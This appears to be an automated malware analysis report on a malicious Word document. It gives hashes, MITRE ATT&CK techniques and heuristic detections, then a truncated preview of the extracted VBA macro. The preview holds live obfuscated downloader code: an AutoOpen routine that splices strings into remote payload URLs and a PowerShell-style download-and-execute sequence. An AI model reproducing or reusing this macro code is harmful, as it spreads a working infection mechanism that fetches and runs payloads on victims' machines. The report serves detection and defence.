Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9cf6788755dc5f8…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 249.0 KB
Created: 2017-12-28 07:34:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: a91c39d4614506361302a8ec345a857a
SHA-1: b9c59e6260ab890d1334f2a7b538eec1f1f237d5
SHA-256: f9cf6788755dc5f82017e62b08f8f36eaf92806de4c89110207a13da27d7529f
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a downloaded payload. The script reconstructs a URL from concatenated strings, which appears to be the primary download source for the secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure' further supports the malicious intent.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 96843 bytes
SHA-256: a7105c63029e8ef9806d33d9eb77b0769e1dd18de8a79d70574fe1207586d4d9

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IlGhtlQuR"
Function wVbVwiSEbQodvj()
On Error Resume Next
kuhoahLFLL = (247 - Tan(733 * CInt(2865)) * PHMmItAj - ZjBwbOOYXTLWlr / (4772 - CStr(ksAwvdUJw) + iUmRw3 + CDate(orhEwbWcpvU / CDbl(FZNavsBfmd - zBQsBoVEZ * 318 / Atn(8673))) * QnWhUbs + CSng(uwwsNmblUhbHQ)))
zSZnwPl = (247 - Tan(733 * CInt(2865)) * CkGjNLpjYhjP - jdpOjuTYnHRw / (4772 - CStr(ldROnhpwjsK) + iUmRw3 + CDate(rqTiwCvbTw / CDbl(NplfNIPc - iiaLRJtCakzki * 318 / Atn(8673))) * pEzuqFVXLoUEY + CSng(BbpTQVr)))
DLKzV = Mid("1300HVac4sblU7onRAfqkNtkIBtpF4/P60u/zbE+zbE,hzbE6Rp+6Rp+zbEttz'+'bE+zbEp:/6Rp+6Rp/medizbE+zbE6Rp+6Rp'+'amulzbE+z'+'bEtizbE+zbEkaz'+'bE+zbErya.com/VzbE+zbE88bzbE+zbEs6Rp+6RpkzbE+zbEk/,h'+'ttp:77j", 31, 161)
difElowVd = (247 - Tan(733 * CInt(2865)) * KbhCfiUoTquSo - rtbRJqshUGnd / (4772 - CStr(QTncSnXcu) + iUmRw3 + CDate(RvJVFcFzvwoubG / CDbl(waAdHbOB - DUfOciQKw * 318 / Atn(8673))) * JVAVnFOIsfdVs + CSng(RUNXznYCusRk)))
NkDKYAPvlod = (247 - Tan(733 * CInt(2865)) * blwPZpjabr - jZzPLniQ / (4772 - CStr(rESRJaV) + iUmRw3 + CDate(GGAiXoooEn / CDbl(EbCwkBvJwiCrdi - iWShGwTO * 318 / Atn(8673))) * UqXLlJaGAi + CSng(doFiPNQW)))
IlsRiflvBGE = (247 - Tan(733 * CInt(2865)) * rVQiiziwpwENXs - WWnicwwIR / (4772 - CStr(KJVGbHECIXnbz) + iUmRw3 + CDate(YJkcWIKbuFjXEj / CDbl(zuNzpToN - OqAKPUiuZpJSO * 318 / Atn(8673))) * mIijOPaDCV + CSng(KdabIfjwuNfIzL)))
NDafuGoJYa = Mid("KzwZ7sP//arteazbE+zbEndizbE+zbEnozbE+zbEpzbE+zbEeruzbE+zbEazbE+zbEno.comzbE+zbE/GzbE+zbEIL0bh/z'+'6Rp+6RpbE+zbE,http'+'zbE+zbE://v2fob", 8, 123)
UnKzrLprR = (247 - Tan(733 * CInt(2865)) * DOWAQGRVWhzlM - itdjYpDwruWi / (4772 - CStr(QkSsiwYQGUXvis) + iUmRw3 + CDate(kTkaQGb / CDbl(ldrhmHXbdmMBl - oPonRYZ * 318 / Atn(8673))) * ouwwLXK + CSng(NnowjOqOmJisuI)))
UijXtiwqTu = (247 - Tan(733 * CInt(2865)) * swIRYAjQXzowd - quRCYmCPPYmHbT / (4772 - CStr(lCKrPkYj) + iUmRw3 + CDate(DGmkJwOv / CDbl(HICSZalncij - QYPFlzdHNNS * 318 / Atn(8673))) * HzSARGTKr + CSng(ULITckGcHpw)))
XLZPHvvhimi = (247 - Tan(733 * CInt(2865)) * qTfiVldoD - iozkovzRj / (4772 - CStr(ZMoXaZZBIp) + iUmRw3 + CDate(MjcGijtoKkwl / CDbl(BZsdwOjbNjsd - IDwLbjNhSIV * 318 / Atn(8673))) * JPFcWobbGVB + CSng(vCuGFwzjczX)))
aPshAZjH = Mid("fmFtzbE+zbEours.ru/zbE+zbEfzbE+zbEu'+'iXazbE+z6Rp+6RpbEKzbE+zbE6/TiX.SpzbE+zbElit(zb6Rp+6RpE+zbET'+'zbE+zbEi'+'X,TiXzbE+zbE6Rp+6R'+'p);zbE+zbEIr6Rp+6RpWkzbE+zbEarapas =z'+'bE+zbE zbEBr9qKs2q5z", 4, 178)
rTPfXaIFZ = (247 - Tan(733 * CInt(2865)) * mhXfXzknPtp - LZHkVWPZnmEDw / (4772 - CStr(UtBlGdRcN) + iUmRw3 + CDate(dmiUaDPaWUIC / CDbl(VGlaXrzdTiG - rldnMWiMWHj * 318 / Atn(8673))) * uwjWdjcJSPjiU + CSng(ulNHJEc)))
voMHnJpsWc = (247 - Tan(733 * CInt(2865)) * HjRBOjwM - tzGVUtpZuWOOJ / (4772 - CStr(jpLIzAlsluT) + iUmRw3 + CDate(BBldNpu / CDbl(UKUKKiTfEBH - wEhMCazLCAMLCQ * 318 / Atn(8673))) * noQIYTiKZVBwR + CSng(FnknYGwUZbms)))
kQqFjJwPQAP = (247 - Tan(733 * CInt(2865)) * iSlmKzZqHOXwf - HcAmGwMbFz / (4772 - CStr(JczwPziKF) + iUmRw3 + CDate(RlrWikbIS / CDbl(WXVdkHWz - dHMmTAVcsrQ * 318 / Atn(8673))) * naIqrJQcLkSns + CSng(mHTNIajibIEwXV)))
JbGtzBnBp = Mid("bzF6i6TrWK1E+z'+'bEcd = zbE+zbETizbE+zbEXhzbE+zbEMJu", 12, 38)
JdLzo = (247 - Tan(733 * CInt(2865)) * cTzJIuqfrnsi - TtIrBcjizNc / (4772 - CStr(iJuTOpWfkB) + iUmRw3 + CDate(bLsEaBNArEzmD / CDbl(haKMEfGV - dkvMcwWCqRCj * 318 / Atn(8673))) * IYFcjNkShXr + CSng(hOMTfWlG)))
IfjGUupbwuh = (247 - Tan(733 * CInt(2865)) * wawzDIu - wfdHXjX / (4772 - CStr(jQdKAHwwOIYibv) + iUmRw3 + CDate(EKABwijkomRCp / CDbl(FFkPqqqqNDp - BlukQbDqYwW * 318 / Atn(8673))) * ZKzfoXiEHQI + CSng(oOlFwOw)))
KuHbMmi = (247 - Tan(733 * CInt(2865)) * PTiplBVBGUA - CSlGbvtkSwM / (4772 - CStr(EvjKjKv) + iUmRw3 + CDate(aEtEanwLP / CDbl(bCrciwaME - sWISGakpRLS * 318 / Atn(8673))) * ZjFzYjjnzhVBVK + CSng(cRnjWGUY)))
hbsbwz = Mid("EhTNWKaqNHXFE(([CHAR]54+[CHAR]82+[CHAR]
... (truncated)